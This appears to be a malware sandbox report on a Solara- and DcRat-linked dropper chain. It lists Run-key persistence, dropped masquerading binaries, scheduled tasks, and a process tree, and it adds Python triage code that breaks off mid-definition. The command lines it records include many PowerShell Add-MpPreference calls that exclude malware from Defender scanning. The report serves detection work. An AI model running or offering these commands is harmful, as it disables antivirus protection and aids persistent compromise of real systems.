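        return "unknown-name"
    return "expected-location" if str(p.parent).lower() in EXPECTED_DIRS[name] else "masquerade"


def triage(run_lines, cmdlines):
    """One finding per Run entry, cross-referenced with the Defender exclusions."""
    excluded = parse_exclusions(cmdlines)
    return [
        {"hive": hive, "value": name, "path": path, "writer": writer,
         "verdict": classify(path), "defender_excluded": path.lower() in excluded}
        for hive, name, path, writer in parse_run_entries(run_lines)
    ]


def high_confidence(findings):
    """Persisted under a stolen system-binary name AND carved out of Defender scanning."""
    return [f for f in findings if f["verdict"] == "masquerade" and f["defender_excluded"]]


def ps_exclusion_cmd(path: str) -> str:
    """Rebuild the command-line shape the report shows for one exclusion (assumed helper)."""
    return '"powershell" -Command Add-MpPreference -ExclusionPath ' + "'" + path + "'"


# Rows copied from the report (a subset of its 43 Run entries).
RUN_LINES = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\WindowsRE\\csrss.exe\"" Refcrt.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\DriversavessessionDlldhcp\\Refcrt.exe\"" Refcrt.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Cursors\\smss.exe\"" Refcrt.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller = "\"C:\\Users\\Admin\\AppData\\Local\\TrustedInstaller.exe\"" Roblox.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" faildsfsdf.exe',
]
# Exclus paths copied from the report's process tree.
CMDLINES = [ps_exclusion_cmd(p) for p in (
    r"C:\DriversavessessionDlldhcp\Refcrt.exe",
    r"C:\Recovery\WindowsRE\csrss.exe",
    r"C:\Windows\Cursors\smss.exe",
    r"C:\Windows\SKB\LanguageModels\RuntimeBroker.exe",
)]

if __name__ == "__main__":
    for f in triage(RUN_LINES, CMDLINES):
        flag = "HIGH" if high_confidence([f]) else "    "
        print(f"{flag} {f['hive']} {f['value']:<18} {f['verdict']:<17} excluded={f['defender_excluded']} {f['path']}")
```

Run against the full table, the high-confidence set is every entry whose name is a system binary and whose path also appears in an Add-MpPreference command line; the Refcrt.exe and "Microsoft Paint" entries stay in the unknown-name bucket because the check only knows about the stolen names, which is deliberate: a name-only check is what keeps the rule cheap enough to run over a whole fleet's Run keys.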
Blocklisted process makes network request 2 IoCs
Processes:
msiexec.exe
flow pid process
28 2424 msiexec.exe
30 2424 msiexec.exe
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exe
description ioc process
File opened (read-only) by msiexec.exe, one entry per drive letter: \??\G: \??\I: \??\S: \??\V: \??\X: \??\U: \??\Y: \??\H: \??\K: \??\N: \??\O: \??\P: \??\Q: \??\W: \??\Z: \??\A: \??\E: \??\J: \??\L: \??\M: \??\B: \??\R: \??\T:
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc
26 ip-api.com
46 ipinfo.io
47 ipinfo.io
Drops file in System32 directory 2 IoCs
Processes:
csc.exe
description ioc process
File created \??\c:\Windows\System32\CSC9923422659A044C39A5D951F6C4B4A87.TMP csc.exe
File created \??\c:\Windows\System32\sobql9.exe csc.exe
Drops file in Program Files directory 23 IoCs
Processes:
Refcrt.exe, ComContainerbrowserRefRuntime.exe, csc.exe
description ioc process
File created C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe Refcrt.exe
File created C:\Program Files (x86)\Internet Explorer\ja-JP\69ddcba757bf72 Refcrt.exe
File opened for modification C:\Program Files (x86)\Windows Portable Devices\ComContainerbrowserRefRuntime.exe ComContainerbrowserRefRuntime.exe
File created \??\c:\Program Files (x86)\Internet Explorer\ja-JP\CSC7EF3102F42B4454780319C960827883.TMP csc.exe
File created \??\c:\Program Files\WindowsPowerShell\dllhost.exe csc.exe
File created C:\Program Files\WindowsPowerShell\dllhost.exe Refcrt.exe
File created C:\Program Files\Uninstall Information\1143e5710f078d Refcrt.exe
File created C:\Program Files (x86)\Windows Portable Devices\ComContainerbrowserRefRuntime.exe ComContainerbrowserRefRuntime.exe
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\unsecapp.exe ComContainerbrowserRefRuntime.exe
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\29c1c3cc0f7685 ComContainerbrowserRefRuntime.exe
File created \??\c:\Program Files (x86)\Microsoft.NET\RedistList\CSC7A0F739559C14E76B9FCB2905B968626.TMP csc.exe
File created \??\c:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe csc.exe
File created \??\c:\Program Files\WindowsPowerShell\CSCBA97CDFE29334993A62C13D44C919133.TMP csc.exe
File created C:\Program Files\WindowsPowerShell\5940a34987c991 Refcrt.exe
File created C:\Program Files\Uninstall Information\SolaraBootstrapper.exe Refcrt.exe
File created C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe Refcrt.exe
File created C:\Program Files (x86)\Windows Defender\ja-JP\SolaraBootstrapper.exe ComContainerbrowserRefRuntime.exe
File created C:\Program Files (x86)\Windows Defender\ja-JP\1143e5710f078d ComContainerbrowserRefRuntime.exe
File created \??\c:\Program Files\Uninstall Information\CSC7DE149071344984BABDF789467E5B10.TMP csc.exe
File created \??\c:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe csc.exe
File created C:\Program Files (x86)\Microsoft.NET\RedistList\331d3f61e3e52a Refcrt.exe
File created C:\Program Files (x86)\Windows Portable Devices\33f6b6f444b053 ComContainerbrowserRefRuntime.exe
File created \??\c:\Program Files\Uninstall Information\SolaraBootstrapper.exe csc.exe
Drops file in Windows directory 26 IoCs
Processes:
Refcrt.exe, msiexec.exe, csc.exe, faildsfsdf.exe
description ioc process
File created C:\Windows\Vss\Writers\Application\WmiPrvSE.exe Refcrt.exe
File opened for modification C:\Windows\Installer\MSID1AA.tmp msiexec.exe
File created C:\Windows\Cursors\smss.exe Refcrt.exe
File opened for modification C:\Windows\Installer\ msiexec.exe
File opened for modification C:\Windows\Installer\MSIE63C.tmp msiexec.exe
File opened for modification C:\Windows\Installer\e57cdef.msi msiexec.exe
File opened for modification C:\Windows\Installer\MSIF495.tmp msiexec.exe
File created C:\Windows\Vss\Writers\Application\24dbde2999530e Refcrt.exe
File created C:\Windows\SKB\LanguageModels\RuntimeBroker.exe Refcrt.exe
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe
File created C:\Windows\SKB\LanguageModels\9e8d7a4ca61bd9 Refcrt.exe
File created C:\Windows\Cursors\69ddcba757bf72 Refcrt.exe
File created C:\Windows\fr-FR\088424020bedd6 Refcrt.exe
File created \??\c:\Windows\Vss\Writers\Application\CSC1695FE976BC94F94849813BF48BB424.TMP csc.exe
File opened for modification C:\Windows\Installer\MSID11B.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSID16A.tmp msiexec.exe
File created C:\Windows\fr-FR\conhost.exe Refcrt.exe
File created C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC} msiexec.exe
File created C:\Windows\Installer\e57cdef.msi msiexec.exe
File created \??\c:\Windows\SKB\LanguageModels\CSCF579D11E63E4D1AA25EA79FCBFF6CC.TMP csc.exe
File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe
File created C:\Windows\xdwd.dll faildsfsdf.exe
File created \??\c:\Windows\Vss\Writers\Application\WmiPrvSE.exe csc.exe
File created C:\Windows\OCR\en-us\RuntimeBroker.exe Refcrt.exe
File opened for modification C:\Windows\Installer\MSIF504.tmp msiexec.exe
File created \??\c:\Windows\SKB\LanguageModels\RuntimeBroker.exe csc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Modifies registry class 6 IoCs
Processes:
Frage build.exe, solara.exe, Refcrt.exe, ComContainerbrowserRefRuntime.exe, Roblox.exe, DCRatBuild.exe
description ioc process
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings, one entry each for: Frage build.exe, solara.exe, Refcrt.exe, ComContainerbrowserRefRuntime.exe, Roblox.exe, DCRatBuild.exe
Runs ping.exe 1 TTPs 1 IoCs
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exe
pid process (64 schtasks.exe instances, in order of appearance): 2868, 5736, 1272, 2756, 5176, 7112, 2012, 5124, 1508, 5360, 3964, 2264, 2944, 3916, 6252, 4392, 944, 1032, 6944, 1688, 2556, 4060, 3336, 6996, 5356, 6216, 5488, 3864, 5436, 7012, 7148, 3252, 552, 3460, 1408, 2492, 6440, 3040, 3720, 4188, 2728, 6424, 1924, 376, 5428, 1552, 4240, 2404, 2004, 6112, 6576, 3776, 4440, 4468, 6560, 3116, 400, 5824, 3208, 60, 964, 4892, 3204, 324
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
SolaraBootstrapper.exe, Refcrt.exe, powershell.exe (20 instances)
pid process (repeated entries collapsed, count in parentheses)
3012 SolaraBootstrapper.exe (2 entries)
4084 Refcrt.exe (22 entries)
924 powershell.exe (2 entries)
3380 powershell.exe (2 entries)
1996 powershell.exe (2 entries)
1116 powershell.exe (2 entries)
416 powershell.exe (2 entries)
1520 powershell.exe (2 entries)
456 powershell.exe (2 entries)
3680 powershell.exe (2 entries)
1664 powershell.exe (2 entries)
3688 powershell.exe (2 entries)
3168 powershell.exe (2 entries)
1688 powershell.exe (2 entries)
400 powershell.exe (2 entries)
828 powershell.exe (2 entries)
2836 powershell.exe (2 entries)
1032 powershell.exe (2 entries)
2748 powershell.exe (2 entries)
4100 powershell.exe (2 entries)
388 powershell.exe (2 entries)
60 powershell.exe (2 entries)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
faildsfsdf.exe, SolaraBootstrapper.exe, Refcrt.exe, msiexec.exe, msiexec.exe, powershell.exe (20 instances)
description pid process (entries grouped by process, in order of appearance within each group)
Token: SeDebugPrivilege 2568 faildsfsdf.exe
Token: SeDebugPrivilege 3012 SolaraBootstrapper.exe
Token: SeDebugPrivilege 4084 Refcrt.exe
Tokens for 4476 msiexec.exe (31 entries): SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Tokens for 2424 msiexec.exe (10 entries): SeSecurityPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege
Token: SeDebugPrivilege, one entry per powershell.exe instance, PIDs: 924, 3380, 1996, 1116, 416, 1520, 456, 3680, 1664, 828, 400, 3168, 1688, 3688, 2748, 2836, 4100, 60, 1032, 388
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
SolaraBootstrapper.exe, Youtube.exe, Result.exe, DCRatBuild.exe, Frage build.exe, solara.exe, WScript.exe, cmd.exe, SolaraBootstrapper.exe, msiexec.exe, Refcrt.exe
description pid process target process (one line per parent/child pair; the count is the number of identical entries the report lists for it)
PID 5044 wrote to memory of 5072 5044 SolaraBootstrapper.exe Youtube.exe (3 entries)
PID 5044 wrote to memory of 2568 5044 SolaraBootstrapper.exe faildsfsdf.exe (2 entries)
PID 5072 wrote to memory of 5100 5072 Youtube.exe Result.exe (3 entries)
PID 5072 wrote to memory of 4140 5072 Youtube.exe DCRatBuild.exe (3 entries)
PID 5072 wrote to memory of 392 5072 Youtube.exe Bloxstrap.exe (2 entries)
PID 5072 wrote to memory of 1660 5072 Youtube.exe Frage build.exe (3 entries)
PID 5100 wrote to memory of 3012 5100 Result.exe SolaraBootstrapper.exe (3 entries)
PID 5100 wrote to memory of 3504 5100 Result.exe solara.exe (3 entries)
PID 4140 wrote to memory of 1452 4140 DCRatBuild.exe WScript.exe (3 entries)
PID 1660 wrote to memory of 904 1660 Frage build.exe WScript.exe (3 entries)
PID 3504 wrote to memory of 3112 3504 solara.exe Conhost.exe (3 entries)
PID 3112 wrote to memory of 1072 3112 WScript.exe cmd.exe (3 entries)
PID 1072 wrote to memory of 4084 1072 cmd.exe Refcrt.exe (2 entries)
PID 3012 wrote to memory of 4476 3012 SolaraBootstrapper.exe msiexec.exe (3 entries)
PID 2424 wrote to memory of 3592 2424 msiexec.exe MsiExec.exe (2 entries)
PID 2424 wrote to memory of 4396 2424 msiexec.exe MsiExec.exe (3 entries)
PID 4084 wrote to memory of 388 4084 Refcrt.exe powershell.exe (2 entries)
PID 4084 wrote to memory of 1116 4084 Refcrt.exe powershell.exe (2 entries)
PID 4084 wrote to memory of 3680 4084 Refcrt.exe powershell.exe (2 entries)
PID 4084 wrote to memory of 828 4084 Refcrt.exe powershell.exe (2 entries)
PID 4084 wrote to memory of 1996 4084 Refcrt.exe powershell.exe (2 entries)
PID 4084 wrote to memory of 3380 4084 Refcrt.exe powershell.exe (2 entries)
PID 4084 wrote to memory of 400 4084 Refcrt.exe schtasks.exe (2 entries)
PID 4084 wrote to memory of 3688 4084 Refcrt.exe powershell.exe (2 entries)
PID 4084 wrote to memory of 416 4084 Refcrt.exe powershell.exe (2 entries)
PID 4084 wrote to memory of 924 4084 Refcrt.exe powershell.exe (2 entries)
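The table above lists one entry per WriteProcessMemory call, so every parent/child pair is repeated two or three times and the chain from the initial SolaraBootstrapper.exe down to the PowerShell instances is hard to read off; it also attaches two different image names to PID 3112 (Conhost.exe as the child of solara.exe, WScript.exe as the parent of cmd.exe). The following is an added example, not code from this report or from the sample, that parses entries in the shape the sandbox renders them, collapses repeats into counted edges, keeps every image name seen for a PID so that such collisions stay visible, and walks the parent pointers back to the root. The sample entries are copied from this report; the edge and lineage logic is the example's own.

```python
"""Rebuild process lineage from the "Suspicious use of WriteProcessMemory" table
of a sandbox report. Added example, not code from the report or from the sample.

The sandbox renders one entry per WriteProcessMemory call, in the shape
    PID <parent> wrote to memory of <child> <parent> <parent image> <child image>
and several entries may sit on one line. The sample entries are copied from this
report; collapsing repeats into counted edges and walking parent pointers back
to the root is this example's own logic.
"""
import re
from collections import Counter, defaultdict

# Image names may contain spaces ("Frage build.exe"), so match lazily up to
# ".exe" and require the next entry (or end of line) to follow the child image.
ENTRY = re.compile(
    r"PID (?P<ppid>\d+) wrote to memory of (?P<pid>\d+) (?P=ppid) "
    r"(?P<pimg>.+?\.exe) (?P<cimg>.+?\.exe)(?=\s+PID\s|\s*$)"
)


def parse_entries(lines):
    """Return (edges, names).

    edges: Counter of (parent pid, child pid) -> number of entries seen.
    names: every image name the report attached to a pid; more than one name
           on a pid means pid reuse inside the run or a mislabelled entry.
    """
    edges = Counter()
    names = defaultdict(set)
    for line in lines:
        for m in ENTRY.finditer(line):
            ppid, pid = int(m["ppid"]), int(m["pid"])
            edges[(ppid, pid)] += 1
            names[ppid].add(m["pimg"])
            names[pid].add(m["cimg"])
    return edges, names


def lineage(edges, names, pid):
    """Chain from the root down to pid as [(pid, 'img|img'), ...]."""
    parent_of = {}
    for ppid, cpid in edges:
        parent_of.setdefault(cpid, ppid)  # first recorded parent wins
    chain, seen = [], set()
    while pid not in seen:  # 'seen' guards against cycles caused by pid reuse
        seen.add(pid)
        chain.append((pid, "|".join(sorted(names[pid]))))
        if pid not in parent_of:
            break
        pid = parent_of[pid]
    chain.reverse()
    return chain


def children_of(edges, names, ppid):
    """(child pid, image, entry count) for every child the parent wrote into."""
    return sorted((c, "|".join(sorted(names[c])), n) for (p, c), n in edges.items() if p == ppid)


def render(chain):
    """Human-readable 'pid image -> pid image' line for a lineage chain."""
    return " -> ".join(f"{pid} {img}" for pid, img in chain)


# Entries copied from the report (repeats kept; two entries share the last line).
SAMPLE = [
    "PID 5044 wrote to memory of 5072 5044 SolaraBootstrapper.exe Youtube.exe",
    "PID 5044 wrote to memory of 5072 5044 SolaraBootstrapper.exe Youtube.exe",
    "PID 5044 wrote to memory of 5072 5044 SolaraBootstrapper.exe Youtube.exe",
    "PID 5072 wrote to memory of 5100 5072 Youtube.exe Result.exe",
    "PID 5072 wrote to memory of 1660 5072 Youtube.exe Frage build.exe",
    "PID 1660 wrote to memory of 904 1660 Frage build.exe WScript.exe",
    "PID 5100 wrote to memory of 3504 5100 Result.exe solara.exe",
    "PID 3504 wrote to memory of 3112 3504 solara.exe Conhost.exe",
    "PID 3112 wrote to memory of 1072 3112 WScript.exe cmd.exe",
    "PID 1072 wrote to memory of 4084 1072 cmd.exe Refcrt.exe",
    "PID 4084 wrote to memory of 388 4084 Refcrt.exe powershell.exe "
    "PID 4084 wrote to memory of 388 4084 Refcrt.exe powershell.exe",
]

if __name__ == "__main__":
    edges, names = parse_entries(SAMPLE)
    print(render(lineage(edges, names, 388)))
    for cpid, img, n in children_of(edges, names, 5072):
        print(f"5072 -> {cpid} {img} ({n} entries)")
```

The chain for PID 388 comes out eight processes deep, with the 3112 hop rendered as "Conhost.exe|WScript.exe" rather than silently picking one name; when a sandbox run reuses PIDs, that joined label is the cue to check timestamps before trusting the parent pointer.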
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
[1] C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
    - DcRat
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID: 5044
  [2] C:\Users\Admin\AppData\Local\Temp\Youtube.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Youtube.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID: 5072
    [3] C:\Users\Admin\AppData\Local\Temp\Result.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\Result.exe"
        - Checks computer location settings
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        PID: 5100
      [4] C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID: 3012
        [5] C:\Windows\SysWOW64\msiexec.exe
            Command line: "msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
            - Suspicious use of AdjustPrivilegeToken
            PID: 4476
      [4] C:\Users\Admin\AppData\Local\Temp\solara.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\solara.exe"
          - Checks computer location settings
          - Executes dropped EXE
          - Modifies registry class
          - Suspicious use of WriteProcessMemory
          PID: 3504
        [5] C:\Windows\SysWOW64\WScript.exe
            Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"
            - Checks computer location settings
            - Suspicious use of WriteProcessMemory
            PID: 3112
          [6] C:\Windows\SysWOW64\cmd.exe
              Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "
              - Suspicious use of WriteProcessMemory
              PID: 1072
            [7] C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
                Command line: "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
                - Modifies WinLogon for persistence
                - Checks computer location settings
                - Executes dropped EXE
                - Adds Run key to start application
                - Drops file in Program Files directory
                - Drops file in Windows directory
                - Modifies registry class
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of WriteProcessMemory
                PID: 4084
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 388
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\csrss.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 1116
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 3680
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Refcrt.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 828
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\WmiPrvSE.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 1996
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SKB\LanguageModels\RuntimeBroker.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 3380
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\dllhost.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 400
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\SolaraBootstrapper.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 3688
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\smss.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 416
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\Registry.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 924
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\backgroundTaskHost.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 456
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\fr-FR\conhost.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 60
                [9] C:\Windows\System32\Conhost.exe
                    Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    PID: 3112
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 1520
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\cmd.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 1664
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 1032
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\fontdrvhost.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 3168
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Refcrt.exe'
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 2748
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\conhost.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\sysmon.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\Refcrt.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZgZhaJuw4k.bat"8⤵PID:5448
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵PID:5980
-
-
C:\Windows\Cursors\smss.exe"C:\Windows\Cursors\smss.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6104
-
-
-
-
-
-
-
-
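The sixteen Add-MpPreference calls above each exclude one dropped file from Defender scanning; the Bloxstrap and Roblox.exe trees later in this report widen the same technique to whole directories, the drive root and every .exe and .dll. The Python below is an added example, not part of this report or of the sample, that classifies such command lines by how much of the disk they carve out of scanning. The sample command lines are copied from this tree (constructed input, not a live log feed), and the mapping from environment variables to scope assumes a default layout in which HomeDrive and SystemDrive are both C:.

```python
"""Classify Windows Defender exclusion changes seen in process command lines.

Added example, not code from the sandbox report or from the sample it
describes. SAMPLE_CMDLINES is constructed by copying command lines from this
report's process tree; in production the input would be the CommandLine field
of Sysmon Event ID 1 or Security Event ID 4688.
"""
import re
from dataclasses import dataclass

# Scope each environment-variable argument expands to. Assumption: default
# Windows layout, where HomeDrive and SystemDrive are both C:.
ENV_SCOPE = {
    "($pwd).path": "current-dir",
    "$env:userprofile": "user-profile",
    "$env:appdata": "appdata",
    "$env:temp": "temp",
    "$env:systemroot": "windows-dir",
    "$env:homedrive": "drive-root",
    "$env:systemdrive": "drive-root",
}
DRIVE_ROOT = re.compile(r"^[a-z]:[\\/]?$", re.I)           # 'C:', 'C:/', 'C:\'
FILE_EXT = re.compile(r"\.(exe|dll|com|bat|cmd|ps1|vbs|vbe|js)$", re.I)
PARAM = re.compile(r"-Exclusion(Path|Extension)\b", re.I)


@dataclass
class Finding:
    kind: str       # "path" or "extension"
    value: str      # argument as written on the command line
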